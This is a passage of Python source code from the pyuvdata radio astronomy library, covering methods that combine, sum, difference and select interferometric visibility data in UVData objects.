The original phase frame of the data (if it is already phased). Used
for unphasing, only if `unphase_to_drift` or `phase_center_radec`
are set. Defaults to using the 'phase_center_frame' attribute or
'icrs' if that attribute is None.
use_ant_pos : bool
If True, calculate the phased or unphased uvws directly from the
antenna positions rather than from the existing uvws.
Only used if `unphase_to_drift` or `phase_center_radec` are set.
verbose_history : bool
Option to allow more verbose history. If True and if the histories for the
objects are different, the combined object will keep all the history of
all input objects (if many objects are combined this can lead to very long
histories). If False and if the histories for the objects are different,
the combined object will have the history of the first object and only the
parts of the other object histories that are unique (this is done word by
word and can result in hard to interpret histories).
run_check : bool
Option to check for the existence and proper shapes of parameters
after combining objects.
check_extra : bool
Option to check optional parameters as well as required ones.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
combining objects.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
ignore_name : bool
Option to ignore the name of the phase center (`cat_name` in
`phase_center_catalog` when `multi_phase_center=True`, otherwise
`object_name`) when combining two UVData objects. Doing so effectively
adopts the name found in the first UVData object in the sum. Default is
False.
Raises
------
ValueError
If other is not a UVData object, axis is not an allowed value or if
self and other are not compatible.
"""
if inplace:
this = self
else:
this = self.copy()
if not isinstance(other, (list, tuple, np.ndarray)):
# if this is a UVData object already, stick it in a list
other = [other]
# Check that both objects are UVData and valid
this.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
for obj in other:
if not issubclass(obj.__class__, this.__class__):
if not issubclass(this.__class__, obj.__class__):
raise ValueError(
"Only UVData (or subclass) objects can be "
"added to a UVData (or subclass) object"
)
obj.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
# check that all objects have the same array shapes
for obj in other:
if this.future_array_shapes != obj.future_array_shapes:
raise ValueError(
"All objects must have the same `future_array_shapes` parameter. "
"Use the `use_future_array_shapes` or `use_current_array_shapes` "
"methods to convert them."
)
if phase_center_radec is not None and unphase_to_drift:
raise ValueError(
"phase_center_radec cannot be set if unphase_to_drift is True."
)
if unphase_to_drift:
if this.phase_type != "drift":
warnings.warn("Unphasing this UVData object to drift")
this.unphase_to_drift(
phase_frame=orig_phase_frame, use_ant_pos=use_ant_pos
)
for obj in other:
if obj.phase_type != "drift":
warnings.warn("Unphasing other UVData object to drift")
obj.unphase_to_drift(
phase_frame=orig_phase_frame, use_ant_pos=use_ant_pos
)
if phase_center_radec is not None:
if np.array(phase_center_radec).size != 2:
raise ValueError("phase_center_radec should have length 2.")
# If this object is not phased or is not phased close to
# phase_center_radec, (re)phase it.
# Close is defined using the phase_center_ra/dec tolerances.
if this.phase_type == "drift" or (
not np.isclose(
this.phase_center_ra,
phase_center_radec[0],
rtol=this._phase_center_ra.tols[0],
atol=this._phase_center_ra.tols[1],
)
or not np.isclose(
this.phase_center_dec,
phase_center_radec[1],
rtol=this._phase_center_dec.tols[0],
atol=this._phase_center_dec.tols[1],
)
):
warnings.warn("Phasing this UVData object to phase_center_radec")
this.phase(
phase_center_radec[0],
phase_center_radec[1],
phase_frame=phase_frame,
orig_phase_frame=orig_phase_frame,
use_ant_pos=use_ant_pos,
allow_rephase=True,
)
# If other object is not phased or is not phased close to
# phase_center_radec, (re)phase it.
# Close is defined using the phase_center_ra/dec tolerances.
for obj in other:
if obj.phase_type == "drift" or (
not np.isclose(
obj.phase_center_ra,
phase_center_radec[0],
rtol=obj._phase_center_ra.tols[0],
atol=obj._phase_center_ra.tols[1],
)
or not np.isclose(
obj.phase_center_dec,
phase_center_radec[1],
rtol=obj._phase_center_dec.tols[0],
atol=obj._phase_center_dec.tols[1],
)
):
warnings.warn("Phasing other UVData object to phase_center_radec")
obj.phase(
phase_center_radec[0],
phase_center_radec[1],
phase_frame=phase_frame,
orig_phase_frame=orig_phase_frame,
use_ant_pos=use_ant_pos,
allow_rephase=True,
)
allowed_axes = ["blt", "freq", "polarization"]
if axis not in allowed_axes:
raise ValueError(
"If axis is specifed it must be one of: " + ", ".join(allowed_axes)
)
compatibility_params = [
"_vis_units",
"_telescope_name",
"_instrument",
"_telescope_location",
"_phase_type",
"_Nants_telescope",
"_antenna_names",
"_antenna_numbers",
"_antenna_positions",
"_phase_center_ra",
"_phase_center_dec",
"_phase_center_epoch",
"_multi_phase_center",
"_phase_center_catalog",
"_Nphase",
]
if not this.future_array_shapes and not this.flex_spw:
compatibility_params.append("_channel_width")
if not (this.multi_phase_center or ignore_name):
compatibility_params += ["_object_name"]
history_update_string = " Combined data along "
if axis == "freq":
history_update_string += "frequency"
compatibility_params += [
"_polarization_array",
"_ant_1_array",
"_ant_2_array",
"_integration_time",
"_uvw_array",
"_lst_array",
"_phase_center_id_array",
]
elif axis == "polarization":
history_update_string += "polarization"
compatibility_params += [
"_freq_array",
"_ant_1_array",
"_ant_2_array",
"_integration_time",
"_uvw_array",
"_lst_array",
"_phase_center_id_array",
]
elif axis == "blt":
history_update_string += "baseline-time"
compatibility_params += ["_freq_array", "_polarization_array"]
history_update_string += " axis using pyuvdata."
histories_match = []
for obj in other:
histories_match.append(uvutils._check_histories(this.history, obj.history))
this.history += history_update_string
for obj_num, obj in enumerate(other):
if not histories_match[obj_num]:
if verbose_history:
this.history += " Next object history follows. " + obj.history
else:
extra_history = uvutils._combine_history_addition(
this.history, obj.history
)
if extra_history is not None:
this.history += (
" Unique part of next object history follows. "
+ extra_history
)
# Actually check compatibility parameters
for obj in other:
for a in compatibility_params:
params_match = getattr(this, a) == getattr(obj, a)
if not params_match:
msg = (
"UVParameter "
+ a[1:]
+ " does not match. Cannot combine objects."
)
raise ValueError(msg)
if axis == "freq":
this.Nfreqs = sum([this.Nfreqs] + [obj.Nfreqs for obj in other])
if this.future_array_shapes:
this.freq_array = np.concatenate(
[this.freq_array] + [obj.freq_array for obj in other]
)
else:
this.freq_array = np.concatenate(
[this.freq_array] + [obj.freq_array for obj in other], axis=1
)
if this.flex_spw or this.future_array_shapes:
this.channel_width = np.concatenate(
[this.channel_width] + [obj.channel_width for obj in other]
)
if this.flex_spw:
this.flex_spw_id_array = np.concatenate(
[this.flex_spw_id_array] + [obj.flex_spw_id_array for obj in other]
)
this.spw_array = np.concatenate(
[this.spw_array] + [obj.spw_array for obj in other]
)
# We want to preserve per-spw information based on first appearance
# in the concatenated array.
unique_index = np.sort(
np.unique(this.flex_spw_id_array, return_index=True)[1]
)
this.spw_array = this.flex_spw_id_array[unique_index]
this.Nspws = len(this.spw_array)
spacing_error, chanwidth_error = this._check_freq_spacing(
raise_errors=False
)
if spacing_error:
warnings.warn(
"Combined frequencies are not evenly spaced or have differing "
"values of channel widths. This will make it impossible to write "
"this data out to some file types."
)
elif chanwidth_error:
warnings.warn(
"Combined frequencies are separated by more than their "
"channel width. This will make it impossible to write this data "
"out to some file types."
)
if not self.metadata_only:
if this.future_array_shapes:
this.data_array = np.concatenate(
[this.data_array] + [obj.data_array for obj in other], axis=1,
)
this.nsample_array = np.concatenate(
[this.nsample_array] + [obj.nsample_array for obj in other],
axis=1,
)
this.flag_array = np.concatenate(
[this.flag_array] + [obj.flag_array for obj in other], axis=1,
)
else:
this.data_array = np.concatenate(
[this.data_array] + [obj.data_array for obj in other], axis=2,
)
this.nsample_array = np.concatenate(
[this.nsample_array] + [obj.nsample_array for obj in other],
axis=2,
)
this.flag_array = np.concatenate(
[this.flag_array] + [obj.flag_array for obj in other], axis=2,
)
elif axis == "polarization":
this.polarization_array = np.concatenate(
[this.polarization_array] + [obj.polarization_array for obj in other]
)
this.Npols = sum([this.Npols] + [obj.Npols for obj in other])
pol_separation = np.diff(this.polarization_array)
if np.min(pol_separation) < np.max(pol_separation):
warnings.warn(
"Combined polarizations are not evenly spaced. This will "
"make it impossible to write this data out to some file types."
)
if not self.metadata_only:
if this.future_array_shapes:
this.data_array = np.concatenate(
[this.data_array] + [obj.data_array for obj in other], axis=2,
)
this.nsample_array = np.concatenate(
[this.nsample_array] + [obj.nsample_array for obj in other],
axis=2,
)
this.flag_array = np.concatenate(
[this.flag_array] + [obj.flag_array for obj in other], axis=2,
)
else:
this.data_array = np.concatenate(
[this.data_array] + [obj.data_array for obj in other], axis=3,
)
this.nsample_array = np.concatenate(
[this.nsample_array] + [obj.nsample_array for obj in other],
axis=3,
)
this.flag_array = np.concatenate(
[this.flag_array] + [obj.flag_array for obj in other], axis=3,
)
elif axis == "blt":
this.Nblts = sum([this.Nblts] + [obj.Nblts for obj in other])
this.ant_1_array = np.concatenate(
[this.ant_1_array] + [obj.ant_1_array for obj in other]
)
this.ant_2_array = np.concatenate(
[this.ant_2_array] + [obj.ant_2_array for obj in other]
)
this.Nants_data = this._calc_nants_data()
this.uvw_array = np.concatenate(
[this.uvw_array] + [obj.uvw_array for obj in other], axis=0
)
this.time_array = np.concatenate(
[this.time_array] + [obj.time_array for obj in other]
)
this.Ntimes = len(np.unique(this.time_array))
this.lst_array = np.concatenate(
[this.lst_array] + [obj.lst_array for obj in other]
)
this.baseline_array = np.concatenate(
[this.baseline_array] + [obj.baseline_array for obj in other]
)
this.Nbls = len(np.unique(this.baseline_array))
this.integration_time = np.concatenate(
[this.integration_time] + [obj.integration_time for obj in other]
)
if not self.metadata_only:
this.data_array = np.concatenate(
[this.data_array] + [obj.data_array for obj in other], axis=0,
)
this.nsample_array = np.concatenate(
[this.nsample_array] + [obj.nsample_array for obj in other], axis=0,
)
this.flag_array = np.concatenate(
[this.flag_array] + [obj.flag_array for obj in other], axis=0,
)
if this.phase_type == "phased":
this.phase_center_app_ra = np.concatenate(
[this.phase_center_app_ra]
+ [obj.phase_center_app_ra for obj in other]
)
this.phase_center_app_dec = np.concatenate(
[this.phase_center_app_dec]
+ [obj.phase_center_app_dec for obj in other]
)
this.phase_center_frame_pa = np.concatenate(
[this.phase_center_frame_pa]
+ [obj.phase_center_frame_pa for obj in other]
)
if this.multi_phase_center:
this.phase_center_id_array = np.concatenate(
[this.phase_center_id_array]
+ [obj.phase_center_id_array for obj in other]
)
# update filename attribute
for obj in other:
this.filename = uvutils._combine_filenames(this.filename, obj.filename)
if this.filename is not None:
this._filename.form = len(this.filename)
# Check final object is self-consistent
if run_check:
this.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
if not inplace:
return this
def sum_vis(
self,
other,
inplace=False,
difference=False,
verbose_history=False,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
override_params=None,
):
"""
Sum visibilities between two UVData objects.
By default requires that all UVParameters are the same on the two objects
except for `history`, `data_array`, `object_name`, and `extra_keywords`.
The `object_name` values are concatenated if they are different. If keys
in `extra_keywords` have different values the values from the first
object are taken.
Parameters
----------
other : UVData object
Another UVData object which will be added to self.
difference : bool
If True, differences the visibilities of the two UVData objects
rather than summing them.
inplace : bool
If True, overwrite self as we go, otherwise create a third object
as the sum of the two.
verbose_history : bool
Option to allow more verbose history. If True and if the histories for the
two objects are different, the combined object will keep all the history of
both input objects (this can lead to long histories). If False and if the
histories for the two objects are different, the combined object will have
the history of the first object and only the parts of the second object
history that are unique (this is done word by word and can result in hard
to interpret histories).
run_check : bool
Option to check for the existence and proper shapes of parameters
after combining objects.
check_extra : bool
Option to check optional parameters as well as required ones.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
combining objects.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
override_params : array_like of strings
List of object UVParameters to omit from compatibility check. Overridden
parameters will not be compared between the objects, and the values
for these parameters will be taken from the first object.
Returns
-------
UVData Object
If inplace parameter is False.
Raises
------
ValueError
If other is not a UVData object, or if self and other
are not compatible.
"""
if inplace:
this = self
else:
this = self.copy()
# Check that both objects are UVData and valid
this.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
if not issubclass(other.__class__, this.__class__):
if not issubclass(this.__class__, other.__class__):
raise ValueError(
"Only UVData (or subclass) objects can be "
"added to a UVData (or subclass) object"
)
other.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
# check that both objects have the same array shapes
if this.future_array_shapes != other.future_array_shapes:
raise ValueError(
"Both objects must have the same `future_array_shapes` parameter. "
"Use the `use_future_array_shapes` or `use_current_array_shapes` "
"methods to convert them."
)
compatibility_params = list(this.__iter__())
remove_params = ["_history", "_data_array", "_object_name", "_extra_keywords"]
# Add underscores to override_params to match list from __iter__()
# Add to parameters to be removed
if override_params and all(isinstance(param, str) for param in override_params):
for param in override_params:
if param[0] != "_":
param = "_" + param
if param not in compatibility_params:
msg = (
"Provided parameter " + param[1:] + " is not a recognizable "
"UVParameter."
)
raise ValueError(msg)
remove_params.append(param)
# compatibility_params should define the parameters that need to
# be the same for objects to be summed or diffed
compatibility_params = list(set(compatibility_params) - set(remove_params))
# Check each UVParameter in compatibility_params
for param in compatibility_params:
params_match = getattr(this, param) == getattr(other, param)
if not params_match:
msg = (
"UVParameter " + param[1:] + " does not match. Cannot "
"combine objects."
)
raise ValueError(msg)
# Merge extra keywords and object_name
for intersection in set(this.extra_keywords.keys()) & set(
other.extra_keywords.keys()
):
if this.extra_keywords[intersection] != other.extra_keywords[intersection]:
warnings.warn(
"Keyword " + intersection + " in _extra_keywords is different "
"in the two objects. Taking the first object's entry."
)
# Merge extra_keywords lists, taking values from the first object
this.extra_keywords = dict(
list(other.extra_keywords.items()) + list(this.extra_keywords.items())
)
# Merge object_name if different.
if this.object_name != other.object_name:
this.object_name = this.object_name + "-" + other.object_name
# Do the summing / differencing
if difference:
this.data_array = this.data_array - other.data_array
history_update_string = " Visibilities differenced using pyuvdata."
else:
this.data_array = this.data_array + other.data_array
history_update_string = " Visibilities summed using pyuvdata."
histories_match = uvutils._check_histories(this.history, other.history)
this.history += history_update_string
if not histories_match:
if verbose_history:
this.history += " Second object history follows. " + other.history
else:
extra_history = uvutils._combine_history_addition(
this.history, other.history
)
if extra_history is not None:
this.history += (
" Unique part of second object history follows. "
+ extra_history
)
# merge file names
this.filename = uvutils._combine_filenames(this.filename, other.filename)
# Check final object is self-consistent
if run_check:
this.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
if not inplace:
return this
def diff_vis(
self,
other,
inplace=False,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
override_params=None,
):
"""
Difference visibilities between two UVData objects.
By default requires that all UVParameters are the same on the two objects
except for `history`, `data_array`, `object_name`, and `extra_keywords`.
The `object_name` values are concatenated if they are different. If keys
in `extra_keywords` have different values the values from the first
object are taken.
Parameters
----------
other : UVData object
Another UVData object which will be added to self.
inplace : bool
If True, overwrite self as we go, otherwise create a third object
as the sum of the two.
run_check : bool
Option to check for the existence and proper shapes of parameters
after combining objects.
check_extra : bool
Option to check optional parameters as well as required ones.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
combining objects.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
override_params : array_like of strings
List of object UVParameters to omit from compatibility check. Overridden
parameters will not be compared between the objects, and the values
for these parameters will be taken from the first object.
Returns
-------
UVData Object
If inplace parameter is False.
Raises
------
ValueError
If other is not a UVData object, or if self and other
are not compatible.
"""
if inplace:
self.sum_vis(
other,
difference=True,
inplace=inplace,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
override_params=override_params,
)
else:
return self.sum_vis(
other,
difference=True,
inplace=inplace,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
override_params=override_params,
)
def parse_ants(self, ant_str, print_toggle=False):
"""
Get antpair and polarization from parsing an aipy-style ant string.
Used to support the select function. Generates two lists of antenna pair
tuples and polarization indices based on parsing of the string ant_str.
If no valid polarizations (pseudo-Stokes params, or combinations of [lr]
or [xy]) or antenna numbers are found in ant_str, ant_pairs_nums and
polarizations are returned as None.
Parameters
----------
ant_str : str
String containing antenna information to parse. Can be 'all',
'auto', 'cross', or combinations of antenna numbers and polarization
indicators 'l' and 'r' or 'x' and 'y'. Minus signs can also be used
in front of an antenna number or baseline to exclude it from being
output in ant_pairs_nums. If ant_str has a minus sign as the first
character, 'all,' will be appended to the beginning of the string.
See the tutorial for examples of valid strings and their behavior.
print_toggle : bool
Boolean for printing parsed baselines for a visual user check.
Returns
-------
ant_pairs_nums : list of tuples of int or None
List of tuples containing the parsed pairs of antenna numbers, or
None if ant_str is 'all' or a pseudo-Stokes polarizations.
polarizations : list of int or None
List of desired polarizations or None if ant_str does not contain a
polarization specification.
"""
return uvutils.parse_ants(
uv=self,
ant_str=ant_str,
print_toggle=print_toggle,
x_orientation=self.x_orientation,
)
def _select_preprocess(
self,
antenna_nums,
antenna_names,
ant_str,
bls,
frequencies,
freq_chans,
times,
time_range,
lsts,
lst_range,
polarizations,
blt_inds,
):
"""
Build up blt_inds, freq_inds, pol_inds and history_update_string for select.
Parameters
----------
antenna_nums : array_like of int, optional
The antennas numbers to keep in the object (antenna positions and
names for the removed antennas will be retained unless
`keep_all_metadata` is False). This cannot be provided if
`antenna_names` is also provided.
antenna_names : array_like of str, optional
The antennas names to keep in the object (antenna positions and
names for the removed antennas will be retained unless
`keep_all_metadata` is False). This cannot be provided if
`antenna_nums` is also provided.
bls : list of tuple or list of int, optional
A list of antenna number tuples (e.g. [(0, 1), (3, 2)]), a list of
baseline 3-tuples (e.g. [(0, 1, 'xx'), (2, 3, 'yy')]), or a list of
baseline numbers (e.g. [67599, 71699, 73743]) specifying baselines
to keep in the object. For length-2 tuples, the ordering of the
numbers within the tuple does not matter. For length-3 tuples, the
polarization string is in the order of the two antennas. If
length-3 tuples are provided, `polarizations` must be None.
ant_str : str, optional
A string containing information about what antenna numbers
and polarizations to keep in the object. Can be 'auto', 'cross', 'all',
or combinations of antenna numbers and polarizations (e.g. '1',
'1_2', '1x_2y'). See tutorial for more examples of valid strings and
the behavior of different forms for ant_str.
If '1x_2y,2y_3y' is passed, both polarizations 'xy' and 'yy' will
be kept for both baselines (1, 2) and (2, 3) to return a valid
pyuvdata object.
An ant_str cannot be passed in addition to any of `antenna_nums`,
`antenna_names`, `bls` args or the `polarizations` parameters,
if it is a ValueError will be raised.
frequencies : array_like of float, optional
The frequencies to keep in the object, each value passed here should
exist in the freq_array.
freq_chans : array_like of int, optional
The frequency channel numbers to keep in the object.
times : array_like of float, optional
The times to keep in the object, each value passed here should exist
in the time_array. Cannot be used with `time_range`, `lsts`, or
`lst_array`.
time_range : array_like of float, optional
The time range in Julian Date to keep in the object, must be length
2. Some of the times in the object should fall between the first and
last elements. Cannot be used with `times`, `lsts`, or `lst_array`.
lsts : array_like of float, optional
The local sidereal times (LSTs) to keep in the object, each value
passed here should exist in the lst_array. Cannot be used with
`times`, `time_range`, or `lst_range`.
lst_range : array_like of float, optional
The local sidereal time (LST) range in radians to keep in the
object, must be of length 2. Some of the LSTs in the object should
fall between the first and last elements. If the second value is
smaller than the first, the LSTs are treated as having phase-wrapped
around LST = 2*pi = 0, and the LSTs kept on the object will run from
the larger value, through 0, and end at the smaller value.
polarizations : array_like of int or str, optional
The polarizations numbers to keep in the object, each value passed
here should exist in the polarization_array. If passing strings, the
canonical polarization strings (e.g. "xx", "rr") are supported and if the
`x_orientation` attribute is set, the physical dipole strings
(e.g. "nn", "ee") are also supported.
blt_inds : array_like of int, optional
The baseline-time indices to keep in the object. This is
not commonly used.
Returns
-------
blt_inds : list of int
list of baseline-time indices to keep. Can be None (to keep everything).
freq_inds : list of int
list of frequency indices to keep. Can be None (to keep everything).
pol_inds : list of int
list of polarization indices to keep. Can be None (to keep everything).
history_update_string : str
string to append to the end of the history.
"""
# build up history string as we go
history_update_string = " Downselected to specific "
n_selects = 0
if ant_str is not None:
if not (
antenna_nums is None
and antenna_names is None
and bls is None
and polarizations is None
):
raise ValueError(
"Cannot provide ant_str with antenna_nums, antenna_names, "
"bls, or polarizations."
)
else:
bls, polarizations = self.parse_ants(ant_str)
if bls is not None and len(bls) == 0:
raise ValueError(
f"There is no data matching ant_str={ant_str} in this object."
)
# Antennas, times and blt_inds all need to be combined into a set of
# blts indices to keep.
# test for blt_inds presence before adding inds from antennas & times
if blt_inds is not None:
blt_inds = uvutils._get_iterable(blt_inds)
if np.array(blt_inds).ndim > 1:
blt_inds = np.array(blt_inds).flatten()
history_update_string += "baseline-times"
n_selects += 1
if antenna_names is not None:
if antenna_nums is not None:
raise ValueError(
"Only one of antenna_nums and antenna_names can be provided."
)
if not isinstance(antenna_names, (list, tuple, np.ndarray)):
antenna_names = (antenna_names,)
if np.array(antenna_names).ndim > 1:
antenna_names = np.array(antenna_names).flatten()
antenna_nums = []
for s in antenna_names:
if s not in self.antenna_names:
raise ValueError(
"Antenna name {a} is not present in the antenna_names"
" array".format(a=s)
)
antenna_nums.append(
self.antenna_numbers[np.where(np.array(self.antenna_names) == s)][0]
)
if antenna_nums is not None:
antenna_nums = uvutils._get_iterable(antenna_nums)
if np.array(antenna_nums).ndim > 1:
antenna_nums = np.array(antenna_nums).flatten()
if n_selects > 0:
history_update_string += ", antennas"
else:
history_update_string += "antennas"
n_selects += 1
# Check to make sure that we actually have these antenna nums in the data
ant_check = np.logical_or(
np.isin(antenna_nums, self.ant_1_array),
np.isin(antenna_nums, self.ant_2_array),
)
if not np.all(ant_check):
raise ValueError(
"Antenna number % i is not present in the ant_1_array or "
"ant_2_array" % antenna_nums[~ant_check][0]
)
ant_blt_inds = np.where(
np.logical_and(
np.isin(self.ant_1_array, antenna_nums),
np.isin(self.ant_2_array, antenna_nums),
)
)[0]
else:
ant_blt_inds = None
if bls is not None:
if isinstance(bls, list) and all(
isinstance(bl_ind, (int, np.integer,),) for bl_ind in bls
):
for bl_ind in bls:
if not (bl_ind in self.baseline_array):
raise ValueError(
"Baseline number {i} is not present in the "
"baseline_array".format(i=bl_ind)
)
bls = list(zip(*self.baseline_to_antnums(bls)))
elif isinstance(bls, tuple) and (len(bls) == 2 or len(bls) == 3):
bls = [bls]
if len(bls) == 0 or not all(isinstance(item, tuple) for item in bls):
raise ValueError(
"bls must be a list of tuples of antenna numbers "
"(optionally with polarization) or a list of baseline numbers."
)
if not all(
[isinstance(item[0], (int, np.integer,),) for item in bls]
+ [isinstance(item[1], (int, np.integer,),) for item in bls]
):
raise ValueError(
"bls must be a list of tuples of antenna numbers "
"(optionally with polarization) or a list of baseline numbers."
)
if all(len(item) == 3 for item in bls):
if polarizations is not None:
raise ValueError(
"Cannot provide length-3 tuples and also specify polarizations."
)
if not all(isinstance(item[2], str) for item in bls):
raise ValueError(
"The third element in each bl must be a polarization string"
)
if ant_str is None:
if n_selects > 0:
history_update_string += ", baselines"
else:
history_update_string += "baselines"
else:
history_update_string += "antenna pairs"
n_selects += 1
bls_blt_inds = np.zeros(0, dtype=np.int64)
bl_pols = set()
for bl in bls:
if not (bl[0] in self.ant_1_array or bl[0] in self.ant_2_array):
raise ValueError(
"Antenna number {a} is not present in the "
"ant_1_array or ant_2_array".format(a=bl[0])
)
if not (bl[1] in self.ant_1_array or bl[1] in self.ant_2_array):
raise ValueError(
"Antenna number {a} is not present in the "
"ant_1_array or ant_2_array".format(a=bl[1])
)
wh1 = np.where(
np.logical_and(self.ant_1_array == bl[0], self.ant_2_array == bl[1])
)[0]
wh2 = np.where(
np.logical_and(self.ant_1_array == bl[1], self.ant_2_array == bl[0])
)[0]
if len(wh1) > 0:
bls_blt_inds = np.append(bls_blt_inds, list(wh1))
if len(bl) == 3:
bl_pols.add(bl[2])
elif len(wh2) > 0:
bls_blt_inds = np.append(bls_blt_inds, list(wh2))
if len(bl) == 3:
# find conjugate polarization
bl_pols.add(uvutils.conj_pol(bl[2]))
else:
raise ValueError(
"Antenna pair {p} does not have any data "
"associated with it.".format(p=bl)
)
if len(bl_pols) > 0:
polarizations = list(bl_pols)
if ant_blt_inds is not None:
# Use intersection (and) to join antenna_names/nums & ant_pairs_nums
ant_blt_inds = np.array(
list(set(ant_blt_inds).intersection(bls_blt_inds))
)
else:
ant_blt_inds = bls_blt_inds
if ant_blt_inds is not None:
if blt_inds is not None:
# Use intersection (and) to join antenna_names/nums/ant_pairs_nums
# with blt_inds
blt_inds = np.array(
list(set(blt_inds).intersection(ant_blt_inds)), dtype=np.int64
)
else:
blt_inds = ant_blt_inds
have_times = times is not None
have_time_range = time_range is not None
have_lsts = lsts is not None
have_lst_range = lst_range is not None
if (
np.count_nonzero([have_times, have_time_range, have_lsts, have_lst_range])
> 1
):
raise ValueError(
"Only one of [times, time_range, lsts, lst_range] may be "
"specified per selection operation."
)
if times is not None:
times = uvutils._get_iterable(times)
if np.array(times).ndim > 1:
times = np.array(times).flatten()
time_blt_inds = np.zeros(0, dtype=np.int64)
for jd in times:
if np.any(
np.isclose(
self.time_array,
jd,
rtol=self._time_array.tols[0],
atol=self._time_array.tols[1],
)
):
time_blt_inds = np.append(
time_blt_inds,
np.where(
np.isclose(
self.time_array,
jd,
rtol=self._time_array.tols[0],
atol=self._time_array.tols[1],
)
)[0],
)
else:
raise ValueError(
"Time {t} is not present in the time_array".format(t=jd)
)
if time_range is not None:
if np.size(time_range) != 2:
raise ValueError("time_range must be length 2.")
time_blt_inds = np.nonzero(
(self.time_array <= time_range[1]) & (self.time_array >= time_range[0])
)[0]
if time_blt_inds.size == 0:
raise ValueError(
f"No elements in time range between {time_range[0]} and "
f"{time_range[1]}."
)
if lsts is not None:
if np.any(np.asarray(lsts) > 2 * np.pi):
warnings.warn(
"The lsts parameter contained a value greater than 2*pi. "
"LST values are assumed to be in radians, not hours."
)
lsts = uvutils._get_iterable(lsts)
if np.array(lsts).ndim > 1:
lsts = np.array(lsts).flatten()
time_blt_inds = np.zeros(0, dtype=np.int64)
for lst in lsts:
if np.any(
np.isclose(
self.lst_array,
lst,
rtol=self._lst_array.tols[0],
atol=self._lst_array.tols[1],
)
):
time_blt_inds = np.append(
time_blt_inds,
np.where(
np.isclose(
self.lst_array,
lst,
rtol=self._lst_array.tols[0],
atol=self._lst_array.tols[1],
)
)[0],
)
else:
raise ValueError(f"LST {lst} is not present in the lst_array")
if lst_range is not None:
if np.size(lst_range) != 2:
raise ValueError("lst_range must be length 2.")
if np.any(np.asarray(lst_range) > 2 * np.pi):
warnings.warn(
"The lst_range contained a value greater than 2*pi. "
"LST values are assumed to be in radians, not hours."
)
if lst_range[1] < lst_range[0]:
# we're wrapping around LST = 2*pi = 0
lst_range_1 = [lst_range[0], 2 * np.pi]
lst_range_2 = [0, lst_range[1]]
time_blt_inds1 = np.nonzero(
(self.lst_array <= lst_range_1[1])
& (self.lst_array >= lst_range_1[0])
)[0]
time_blt_inds2 = np.nonzero(
(self.lst_array <= lst_range_2[1])
& (self.lst_array >= lst_range_2[0])
)[0]
time_blt_inds = np.union1d(time_blt_inds1, time_blt_inds2)
else:
time_blt_inds = np.nonzero(
(self.lst_array <= lst_range[1]) & (self.lst_array >= lst_range[0])
)[0]
if time_blt_inds.size == 0:
raise ValueError(
f"No elements in LST range between {lst_range[0]} and "
f"{lst_range[1]}."
)
if times is not None or time_range is not None:
if n_selects > 0:
history_update_string += ", times"
else:
history_update_string += "times"
n_selects += 1
if blt_inds is not None:
# Use intesection (and) to join
# antenna_names/nums/ant_pairs_nums/blt_inds with times
blt_inds = np.array(
list(set(blt_inds).intersection(time_blt_inds)), dtype=np.int64
)
else:
blt_inds = time_blt_inds
if lsts is not None or lst_range is not None:
if n_selects > 0:
history_update_string += ", lsts"
else:
history_update_string += "lsts"
n_selects += 1
if blt_inds is not None:
# Use intesection (and) to join
# antenna_names/nums/ant_pairs_nums/blt_inds with times
blt_inds = np.array(
list(set(blt_inds).intersection(time_blt_inds)), dtype=np.int64
)
else:
blt_inds = time_blt_inds
if blt_inds is not None:
if len(blt_inds) == 0:
raise ValueError("No baseline-times were found that match criteria")
if max(blt_inds) >= self.Nblts:
raise ValueError("blt_inds contains indices that are too large")
if min(blt_inds) < 0:
raise ValueError("blt_inds contains indices that are negative")
blt_inds = sorted(set(blt_inds))
if freq_chans is not None:
freq_chans = uvutils._get_iterable(freq_chans)
if np.array(freq_chans).ndim > 1:
freq_chans = np.array(freq_chans).flatten()
if frequencies is None:
if self.future_array_shapes:
frequencies = self.freq_array[freq_chans]
else:
frequencies = self.freq_array[0, freq_chans]
else:
frequencies = uvutils._get_iterable(frequencies)
if self.future_array_shapes:
frequencies = np.sort(
list(set(frequencies) | set(self.freq_array[freq_chans]))
)
else:
frequencies = np.sort(
list(set(frequencies) | set(self.freq_array[0, freq_chans]))
)
if frequencies is not None:
frequencies = uvutils._get_iterable(frequencies)
if np.array(frequencies).ndim > 1:
frequencies = np.array(frequencies).flatten()
if n_selects > 0:
history_update_string += ", frequencies"
else:
history_update_string += "frequencies"
n_selects += 1
if self.future_array_shapes:
freq_arr_use = self.freq_array
else:
freq_arr_use = self.freq_array[0, :]
# Check and see that all requested freqs are available
freq_check = np.isin(frequencies, freq_arr_use)
if not np.all(freq_check):
raise ValueError(
"Frequency %g is not present in the freq_array"
% frequencies[np.where(~freq_check)[0][0]]
)
freq_inds = np.where(np.isin(freq_arr_use, frequencies))[0]
if len(frequencies) > 1:
freq_ind_separation = freq_inds[1:] - freq_inds[:-1]
if self.flex_spw:
freq_ind_separation = freq_ind_separation[
np.diff(self.flex_spw_id_array[freq_inds]) == 0
]
if np.min(freq_ind_separation) < np.max(freq_ind_separation):
warnings.warn(
